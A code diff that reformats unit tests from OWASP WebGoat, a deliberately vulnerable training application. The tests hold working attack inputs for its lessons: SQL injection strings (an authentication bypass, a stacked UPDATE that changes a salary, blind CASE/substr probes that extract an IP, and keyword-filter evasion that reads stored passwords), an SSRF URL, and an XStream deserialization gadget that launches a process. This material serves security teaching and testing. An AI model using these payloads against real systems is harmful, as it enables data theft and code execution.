-                    .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.9.success"))))
-                    .andExpect(jsonPath("$.output").doesNotExist());
-        }
+      mockMvc
+          .perform(
+              MockMvcRequestBuilders.post("/SqlInjection/attack9")
+                  .param("name", "Smithh")
+                  .param("auth_tan", ""))
+          .andExpect(status().isOk())
+          .andExpect(jsonPath("lessonCompleted", is(true)))
+          .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.9.success"))))
+          .andExpect(jsonPath("$.output").doesNotExist());
     }
+  }
 
-    @Test
-    public void malformedQueryReturnsError() throws Exception {
-        try {
-            mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack9")
-                    .param("name", "Smith")
-                    .param("auth_tan", "3SL99A' OR '1' = '1'"))
+  @Test
+  public void malformedQueryReturnsError() throws Exception {
+    try {
+      mockMvc
+          .perform(
+              MockMvcRequestBuilders.post("/SqlInjection/attack9")
+                  .param("name", "Smith")
+                  .param("auth_tan", "3SL99A' OR '1' = '1'"))
+          .andExpect(status().isOk())
+          .andExpect(jsonPath("lessonCompleted", is(false)))
+          .andExpect(jsonPath("$.output", containsString("feedback-negative")));
+    } catch (AssertionError e) {
+      if (!e.getMessage().contains(completedError)) throw e;
 
-                    .andExpect(status().isOk())
-                    .andExpect(jsonPath("lessonCompleted", is(false)))
-                    .andExpect(jsonPath("$.output", containsString("feedback-negative")));
-        } catch (AssertionError e) {
-            if (!e.getMessage().contains(completedError)) throw e;
-
-            mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack9")
-                    .param("name", "Smith")
-                    .param("auth_tan", "3SL99A' OR '1' = '1'"))
-
-                    .andExpect(status().isOk())
-                    .andExpect(jsonPath("lessonCompleted", is(true)))
-                    .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.9.success"))))
-                    .andExpect(jsonPath("$.output", containsString("feedback-negative")));
-        }
+      mockMvc
+          .perform(
+              MockMvcRequestBuilders.post("/SqlInjection/attack9")
+                  .param("name", "Smith")
+                  .param("auth_tan", "3SL99A' OR '1' = '1'"))
+          .andExpect(status().isOk())
+          .andExpect(jsonPath("lessonCompleted", is(true)))
+          .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.9.success"))))
+          .andExpect(jsonPath("$.output", containsString("feedback-negative")));
     }
+  }
 
-    @Test
-    public void SmithIsMostEarningCompletesAssignment() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack9")
+  @Test
+  public void SmithIsMostEarningCompletesAssignment() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjection/attack9")
                 .param("name", "Smith")
-                .param("auth_tan", "3SL99A'; UPDATE employees SET salary = '300000' WHERE last_name = 'Smith"))
-
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("lessonCompleted", is(true)))
-                .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.9.success"))))
-                .andExpect(jsonPath("$.output", containsString("300000")));
-    }
+                .param(
+                    "auth_tan",
+                    "3SL99A'; UPDATE employees SET salary = '300000' WHERE last_name = 'Smith"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("lessonCompleted", is(true)))
+        .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.9.success"))))
+        .andExpect(jsonPath("$.output", containsString("300000")));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson13Test.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson13Test.java
index 333a93515..c319ba89e 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson13Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson13Test.java
@@ -1,102 +1,138 @@
 package org.owasp.webgoat.lessons.sqlinjection.mitigation;
 
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-
 import static org.hamcrest.Matchers.is;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+
 /**
  * @author nbaars
  * @since 5/21/17.
  */
 public class SqlInjectionLesson13Test extends SqlLessonTest {
 
-    @Test
-    public void knownAccountShouldDisplayData() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjectionMitigations/servers")
-                .param("column", "id"))
+  @Test
+  public void knownAccountShouldDisplayData() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/SqlInjectionMitigations/servers").param("column", "id"))
+        .andExpect(status().isOk());
+  }
 
-                .andExpect(status().isOk());
-    }
+  @Test
+  public void addressCorrectShouldOrderByHostname() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/SqlInjectionMitigations/servers")
+                .param(
+                    "column",
+                    "CASE WHEN (SELECT ip FROM servers WHERE hostname='webgoat-prd') LIKE '104.%'"
+                        + " THEN hostname ELSE id END"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$[0].hostname", is("webgoat-acc")));
+  }
 
-    @Test
-    public void addressCorrectShouldOrderByHostname() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjectionMitigations/servers")
-                .param("column", "CASE WHEN (SELECT ip FROM servers WHERE hostname='webgoat-prd') LIKE '104.%' THEN hostname ELSE id END"))
+  @Test
+  public void addressCorrectShouldOrderByHostnameUsingSubstr() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/SqlInjectionMitigations/servers")
+                .param(
+                    "column",
+                    "case when (select ip from servers where hostname='webgoat-prd' and"
+                        + " substr(ip,1,1) = '1') IS NOT NULL then hostname else id end"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$[0].hostname", is("webgoat-acc")));
 
-                .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc")));
-    }
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/SqlInjectionMitigations/servers")
+                .param(
+                    "column",
+                    "case when (select ip from servers where hostname='webgoat-prd' and"
+                        + " substr(ip,2,1) = '0') IS NOT NULL then hostname else id end"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$[0].hostname", is("webgoat-acc")));
 
-    @Test
-    public void addressCorrectShouldOrderByHostnameUsingSubstr() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjectionMitigations/servers")
-                .param("column", "case when (select ip from servers where hostname='webgoat-prd' and substr(ip,1,1) = '1') IS NOT NULL then hostname else id end"))
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/SqlInjectionMitigations/servers")
+                .param(
+                    "column",
+                    "case when (select ip from servers where hostname='webgoat-prd' and"
+                        + " substr(ip,3,1) = '4') IS NOT NULL then hostname else id end"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$[0].hostname", is("webgoat-acc")));
+  }
 
-                .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc")));
+  @Test
+  public void addressIncorrectShouldOrderByIdUsingSubstr() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/SqlInjectionMitigations/servers")
+                .param(
+                    "column",
+                    "case when (select ip from servers where hostname='webgoat-prd' and"
+                        + " substr(ip,1,1) = '9') IS NOT NULL then hostname else id end"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$[0].hostname", is("webgoat-dev")));
+  }
 
-        mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjectionMitigations/servers")
-                .param("column", "case when (select ip from servers where hostname='webgoat-prd' and substr(ip,2,1) = '0') IS NOT NULL then hostname else id end"))
-
-                .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc")));
-
-        mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjectionMitigations/servers")
-                .param("column", "case when (select ip from servers where hostname='webgoat-prd' and substr(ip,3,1) = '4') IS NOT NULL then hostname else id end"))
-
-                .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc")));
-    }
-
-    @Test
-    public void addressIncorrectShouldOrderByIdUsingSubstr() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjectionMitigations/servers")
-                .param("column", "case when (select ip from servers where hostname='webgoat-prd' and substr(ip,1,1) = '9') IS NOT NULL then hostname else id end"))
-
-                .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-dev")));
-    }
-
-    @Test
-    public void trueShouldSortByHostname() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjectionMitigations/servers")
+  @Test
+  public void trueShouldSortByHostname() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/SqlInjectionMitigations/servers")
                 .param("column", "(case when (true) then hostname else id end)"))
+        .andExpect(status().isOk())
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$[0].hostname", is("webgoat-acc")));
+  }
 
-                .andExpect(status().isOk())
-                .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc")));
-    }
-
-    @Test
-    public void falseShouldSortById() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjectionMitigations/servers")
+  @Test
+  public void falseShouldSortById() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/SqlInjectionMitigations/servers")
                 .param("column", "(case when (true) then hostname else id end)"))
+        .andExpect(status().isOk())
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$[0].hostname", is("webgoat-acc")));
+  }
 
-                .andExpect(status().isOk())
-                .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc")));
-    }
+  @Test
+  public void addressIncorrectShouldOrderByHostname() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/SqlInjectionMitigations/servers")
+                .param(
+                    "column",
+                    "CASE WHEN (SELECT ip FROM servers WHERE hostname='webgoat-prd') LIKE '192.%'"
+                        + " THEN hostname ELSE id END"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$[0].hostname", is("webgoat-dev")));
+  }
 
-    @Test
-    public void addressIncorrectShouldOrderByHostname() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjectionMitigations/servers")
-                .param("column", "CASE WHEN (SELECT ip FROM servers WHERE hostname='webgoat-prd') LIKE '192.%' THEN hostname ELSE id END"))
-
-                .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-dev")));
-    }
-
-    @Test
-    public void postingCorrectAnswerShouldPassTheLesson() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjectionMitigations/attack12a")
+  @Test
+  public void postingCorrectAnswerShouldPassTheLesson() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjectionMitigations/attack12a")
                 .param("ip", "104.130.219.202"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(true)));
+  }
 
-                .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(true)));
-    }
-
-    @Test
-    public void postingWrongAnswerShouldNotPassTheLesson() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjectionMitigations/attack12a")
+  @Test
+  public void postingWrongAnswerShouldNotPassTheLesson() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjectionMitigations/attack12a")
                 .param("ip", "192.168.219.202"))
-
-                .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(false)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationOnKeywordsTest.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationOnKeywordsTest.java
index 1b71b8a3f..c160f2a94 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationOnKeywordsTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationOnKeywordsTest.java
@@ -1,33 +1,45 @@
 package org.owasp.webgoat.lessons.sqlinjection.mitigation;
 
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-
 import static org.hamcrest.Matchers.containsString;
 import static org.hamcrest.Matchers.is;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+
 public class SqlOnlyInputValidationOnKeywordsTest extends SqlLessonTest {
 
-    @Test
-    public void solve() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlOnlyInputValidationOnKeywords/attack")
-                .param("userid_sql_only_input_validation_on_keywords", "Smith';SESELECTLECT/**/*/**/FRFROMOM/**/user_system_data;--"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", is(true)))
-                .andExpect(jsonPath("$.feedback", containsString("passW0rD")));
-    }
+  @Test
+  public void solve() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlOnlyInputValidationOnKeywords/attack")
+                .param(
+                    "userid_sql_only_input_validation_on_keywords",
+                    "Smith';SESELECTLECT/**/*/**/FRFROMOM/**/user_system_data;--"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(true)))
+        .andExpect(jsonPath("$.feedback", containsString("passW0rD")));
+  }
 
-    @Test
-    public void containsForbiddenSqlKeyword() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlOnlyInputValidationOnKeywords/attack")
-                .param("userid_sql_only_input_validation_on_keywords", "Smith';SELECT/**/*/**/from/**/user_system_data;--"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", is(false)))
-                .andExpect(jsonPath("$.output", containsString("unexpected token: *<br> Your query was: SELECT * FROM user_data WHERE last_name = 'SMITH';\\\\\\/**\\\\\\/*\\\\\\/**\\\\\\/\\\\\\/**\\\\\\/USER_SYSTEM_DATA;--'")));
-    }
+  @Test
+  public void containsForbiddenSqlKeyword() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlOnlyInputValidationOnKeywords/attack")
+                .param(
+                    "userid_sql_only_input_validation_on_keywords",
+                    "Smith';SELECT/**/*/**/from/**/user_system_data;--"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(false)))
+        .andExpect(
+            jsonPath(
+                "$.output",
+                containsString(
+                    "unexpected token: *<br> Your query was: SELECT * FROM user_data WHERE"
+                        + " last_name ="
+                        + " 'SMITH';\\\\\\/**\\\\\\/*\\\\\\/**\\\\\\/\\\\\\/**\\\\\\/USER_SYSTEM_DATA;--'")));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationTest.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationTest.java
index 323fcb301..48888f3de 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationTest.java
@@ -1,33 +1,38 @@
 package org.owasp.webgoat.lessons.sqlinjection.mitigation;
 
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-
 import static org.hamcrest.Matchers.containsString;
 import static org.hamcrest.Matchers.is;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+
 public class SqlOnlyInputValidationTest extends SqlLessonTest {
 
-    @Test
-    public void solve() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlOnlyInputValidation/attack")
-                .param("userid_sql_only_input_validation", "Smith';SELECT/**/*/**/from/**/user_system_data;--"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", is(true)))
-                .andExpect(jsonPath("$.feedback", containsString("passW0rD")));
-    }
+  @Test
+  public void solve() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlOnlyInputValidation/attack")
+                .param(
+                    "userid_sql_only_input_validation",
+                    "Smith';SELECT/**/*/**/from/**/user_system_data;--"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(true)))
+        .andExpect(jsonPath("$.feedback", containsString("passW0rD")));
+  }
 
-    @Test
-    public void containsSpace() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlOnlyInputValidation/attack")
-                .param("userid_sql_only_input_validation", "Smith' ;SELECT from user_system_data;--"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", is(false)))
-                .andExpect(jsonPath("$.feedback", containsString("Using spaces is not allowed!")));
-    }
+  @Test
+  public void containsSpace() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlOnlyInputValidation/attack")
+                .param(
+                    "userid_sql_only_input_validation", "Smith' ;SELECT from user_system_data;--"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(false)))
+        .andExpect(jsonPath("$.feedback", containsString("Using spaces is not allowed!")));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/ssrf/SSRFTest1.java b/src/test/java/org/owasp/webgoat/lessons/ssrf/SSRFTest1.java
index a87ef50ab..80c29e6dd 100644
--- a/src/test/java/org/owasp/webgoat/lessons/ssrf/SSRFTest1.java
+++ b/src/test/java/org/owasp/webgoat/lessons/ssrf/SSRFTest1.java
@@ -1,51 +1,52 @@
 package org.owasp.webgoat.lessons.ssrf;
 
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.ssrf.SSRF;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-import org.springframework.test.web.servlet.setup.MockMvcBuilders;
-
 import static org.hamcrest.Matchers.is;
 import static org.mockito.Mockito.when;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.junit.jupiter.api.extension.ExtendWith;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.springframework.test.context.junit.jupiter.SpringExtension;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
 /**
- * @author afry 
+ * @author afry
  * @since 12/28/18.
  */
 @ExtendWith(SpringExtension.class)
 public class SSRFTest1 extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new SSRF());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-    }
+  @BeforeEach
+  public void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new SSRF());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+  }
 
-    @Test
-    public void modifyUrlTom() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SSRF/task1")
-                .param("url", "images/tom.png"))
-                .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(false)));
-    }
+  @Test
+  public void modifyUrlTom() throws Exception {
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/SSRF/task1").param("url", "images/tom.png"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(false)));
+  }
 
-    @Test
-    public void modifyUrlJerry() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SSRF/task1")
-                .param("url", "images/jerry.png"))
-                .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(true)));
-    }
+  @Test
+  public void modifyUrlJerry() throws Exception {
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/SSRF/task1").param("url", "images/jerry.png"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(true)));
+  }
 
-    @Test
-    public void modifyUrlCat() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SSRF/task1")
-                .param("url", "images/cat.jpg"))
-                .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(false)));
-    }
+  @Test
+  public void modifyUrlCat() throws Exception {
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/SSRF/task1").param("url", "images/cat.jpg"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/ssrf/SSRFTest2.java b/src/test/java/org/owasp/webgoat/lessons/ssrf/SSRFTest2.java
index 3820dc704..4f689ef5e 100644
--- a/src/test/java/org/owasp/webgoat/lessons/ssrf/SSRFTest2.java
+++ b/src/test/java/org/owasp/webgoat/lessons/ssrf/SSRFTest2.java
@@ -22,45 +22,45 @@
 
 package org.owasp.webgoat.lessons.ssrf;
 
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.ssrf.SSRF;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-import org.springframework.test.web.servlet.setup.MockMvcBuilders;
-
 import static org.hamcrest.Matchers.is;
 import static org.mockito.Mockito.when;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.junit.jupiter.api.extension.ExtendWith;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.springframework.test.context.junit.jupiter.SpringExtension;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
 /**
- * @author afry 
+ * @author afry
  * @since 12/28/18.
  */
 @ExtendWith(SpringExtension.class)
 public class SSRFTest2 extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new SSRF());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-    }
+  @BeforeEach
+  public void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new SSRF());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+  }
 
-    @Test
-    public void modifyUrlIfconfigPro() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SSRF/task2")
-                .param("url", "http://ifconfig.pro"))
-                .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(true)));
-    }
+  @Test
+  public void modifyUrlIfconfigPro() throws Exception {
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/SSRF/task2").param("url", "http://ifconfig.pro"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(true)));
+  }
 
-    @Test
-    public void modifyUrlCat() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SSRF/task2")
-                .param("url", "images/cat.jpg"))
-                .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(false)));
-    }
+  @Test
+  public void modifyUrlCat() throws Exception {
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/SSRF/task2").param("url", "images/cat.jpg"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponentsLessonTest.java b/src/test/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponentsLessonTest.java
index eed97faab..3c8c69711 100644
--- a/src/test/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponentsLessonTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponentsLessonTest.java
@@ -22,60 +22,63 @@
 
 package org.owasp.webgoat.lessons.vulnerablecomponents;
 
-import com.thoughtworks.xstream.XStream;
-import com.thoughtworks.xstream.io.StreamException;
-import org.junit.jupiter.api.Disabled;
-import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.lessons.vulnerablecomponents.Contact;
-import org.owasp.webgoat.lessons.vulnerablecomponents.ContactImpl;
-
 import static org.junit.jupiter.api.Assertions.assertNotNull;
 import static org.junit.jupiter.api.Assertions.assertThrows;
 import static org.junit.jupiter.api.Assertions.assertTrue;
 
+import com.thoughtworks.xstream.XStream;
+import com.thoughtworks.xstream.io.StreamException;
+import org.junit.jupiter.api.Disabled;
+import org.junit.jupiter.api.Test;
+
 public class VulnerableComponentsLessonTest {
 
-	String strangeContact = "<contact class='dynamic-proxy'>\n" + 
-			"<interface>org.owasp.webgoat.vulnerablecomponents.Contact</interface>\n" + 
-			"  <handler class='java.beans.EventHandler'>\n" + 
-			"    <target class='java.lang.ProcessBuilder'>\n" + 
-			"      <command>\n" + 
-			"        <string>calc.exe</string>\n" + 
-			"      </command>\n" + 
-			"    </target>\n" + 
-			"    <action>start</action>\n" + 
-			"  </handler>\n" + 
-			"</contact>";
-	String contact = "<contact>\n"+
-			"</contact>";
-    
-    @Test
-    public void testTransformation() throws Exception {
-    	XStream xstream = new XStream();
-        xstream.setClassLoader(Contact.class.getClassLoader());
-        xstream.alias("contact", ContactImpl.class);
-        xstream.ignoreUnknownElements();
-        assertNotNull(xstream.fromXML(contact));
-    }
-    
-    @Test
-    @Disabled
-    public void testIllegalTransformation() throws Exception {
-    	XStream xstream = new XStream();
-        xstream.setClassLoader(Contact.class.getClassLoader());
-        xstream.alias("contact", ContactImpl.class);
-        xstream.ignoreUnknownElements();
-        Exception e = assertThrows(RuntimeException.class, ()->((Contact)xstream.fromXML(strangeContact)).getFirstName());
-        assertTrue(e.getCause().getMessage().contains("calc.exe"));
-    }
-    
-    @Test
-    public void testIllegalPayload() throws Exception {
-    	XStream xstream = new XStream();
-        xstream.setClassLoader(Contact.class.getClassLoader());
-        xstream.alias("contact", ContactImpl.class);
-        xstream.ignoreUnknownElements();
-        Exception e = assertThrows(StreamException.class, ()->((Contact)xstream.fromXML("bullssjfs")).getFirstName());
-        assertTrue(e.getCause().getMessage().contains("START_DOCUMENT"));
-    }
+  String strangeContact =
+      "<contact class='dynamic-proxy'>\n"
+          + "<interface>org.owasp.webgoat.vulnerablecomponents.Contact</interface>\n"
+          + "  <handler class='java.beans.EventHandler'>\n"
+          + "    <target class='java.lang.ProcessBuilder'>\n"
+          + "      <command>\n"
+          + "        <string>calc.exe</string>\n"
+          + "      </command>\n"
+          + "    </target>\n"
+          + "    <action>start</action>\n"
+          + "  </handler>\n"
+          + "</contact>";
+  String contact = "<contact>\n" + "</contact>";
+
+  @Test
+  public void testTransformation() throws Exception {
+    XStream xstream = new XStream();
+    xstream.setClassLoader(Contact.class.getClassLoader());
+    xstream.alias("contact", ContactImpl.class);
+    xstream.ignoreUnknownElements();
+    assertNotNull(xstream.fromXML(contact));
+  }
+
+  @Test
+  @Disabled
+  public void testIllegalTransformation() throws Exception {
+    XStream xstream = new XStream();
+    xstream.setClassLoader(Contact.class.getClassLoader());
+    xstream.alias("contact", ContactImpl.class);
+    xstream.ignoreUnknownElements();
+    Exception e =
+        assertThrows(
+            RuntimeException.class,
+            () -> ((Contact) xstream.fromXML(strangeContact)).getFirstName());
+    assertTrue(e.getCause().getMessage().contains("calc.exe"));
+  }
+
+  @Test
+  public void testIllegalPayload() throws Exception {
+    XStream xstream = new XStream();
+    xstream.setClassLoader(Contact.class.getClassLoader());
+    xstream.alias("contact", ContactImpl.class);
+    xstream.ignoreUnknownElements();
+    Exception e =
+        assertThrows(
+            StreamException.class, () -> ((Contact) xstream.fromXML("bullssjfs")).getFirstName());
+    assertTrue(e.getCause().getMessage().contains("START_DOCUMENT"));
+  }
 }
